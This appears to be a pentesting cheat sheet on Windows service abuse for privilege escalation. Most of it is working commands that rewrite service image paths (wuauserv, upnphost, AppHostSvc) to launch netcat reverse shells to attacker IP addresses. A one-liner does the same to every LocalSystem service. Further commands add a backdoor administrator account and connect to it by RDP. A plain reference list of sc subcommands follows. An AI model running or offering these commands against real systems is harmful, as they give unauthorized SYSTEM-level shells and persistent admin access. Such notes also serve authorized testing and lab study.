Abusing Services
Powershell
Below is an example on how to abuse the Windows Update Service
# Show all services
Get-Service
# Show details of the services
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\*
# Shows details about the specific service
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\services\wuauserv
DependOnService : {rpcss}
Description : @%systemroot%\system32\wuaueng.dll,-106
DisplayName : @%systemroot%\system32\wuaueng.dll,-105
ErrorControl : 1
FailureActions : {128, 81, 1, 0...}
ImagePath : C:\Windows\system32\svchost.exe -k netsvcs -p
ObjectName : LocalSystem
RequiredPrivileges : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType : 1
Start : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB : 167
SvcMemSoftLimitInMB : 88
Type : 32
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
PSChildName : wuauserv
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
# Sets properties on the service
Set-Itemproperty -path 'HKLM:\system\currentcontrolset\services\wuauserv' -Name 'ImagePath' -value 'c:\temp\nc.exe 10.10.14.23 9001 -e powershell.exe'
Powershell Services Commands
Get all the details about the service. useful to see if you can stop and start etc...
get-service UsoSvc | Select-Object *
get-service wuauserv | select Displayname,Status,ServiceName,Can*
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\* | Select-Object DisplayName, PSChildName, ImagePath Controlling the services
# Starts
Start-Service wuauserv
# Restarts
Restart-Service wuauserv
# Stops the service
Stop-Service wuauserv
# Script
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services* | ?{$.ObjectName -like "LocalSystem"} | Select PSChildName,ImagePath | ForEach-Object {$srvname=$.PSChildName;Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services$srvname" -name ImagePath -Value 'C:\tmp\nc.exe 10.10.16.28 4444 -e powershell.exe'} Service Control
Example 1: Using the Service Control to abuse Universal Plug and Play Service
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.47 9097 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
# In the event of failure
sc config SSDPSRV start= autonet
start SSDPSRVnet
# Start the reverse shell with priviledges
start upnphost
1) Created a user
net user wtf wtf123 /add
net localgroup administrators wtf /add
2) rdesktop -u wtf 10.11.1.13Example 2: Application Host Helper Service
sc query AppHostSvc
sc config AppHostSvc binpath="c:\temp\nc.exe -e cmd 10.10.14.37 9002"
sc stop AppHostSvc
sc start AppHostSvcSC Commands
sc queryex type= service state= all
state= all: Returns a list of all services
state= inactive: Returns a list of stopped services
To get a start of all running services only, do not include the ‘state’ field.
sc queryex type= service commands:
query [qryOpt] Show status
queryEx [qryOpt] Show extended info - pid, flags
GetDisplayName Show the DisplayName
GetKeyName Show the ServiceKeyName
EnumDepend Show Dependencies
qc Show config - dependencies, full path etc
start START a service.
stop STOP a service
pause PAUSE a service.
continue CONTINUE a service.
create Create a service. (add it to the registry)
config permanently change the service configuration
delete Delete a service (from the registry)
control Send a control to a service
interrogate Send an INTERROGATE control request to a service
Qdescription Query the description of a service
description Change the description of a service
Qfailure Query the actions taken by a service upon failure
failure Change the actions taken by a service upon failure
sdShow Display a service's security descriptor using SDDL
SdSet Sets a service's security descriptor using SDDLLast updated
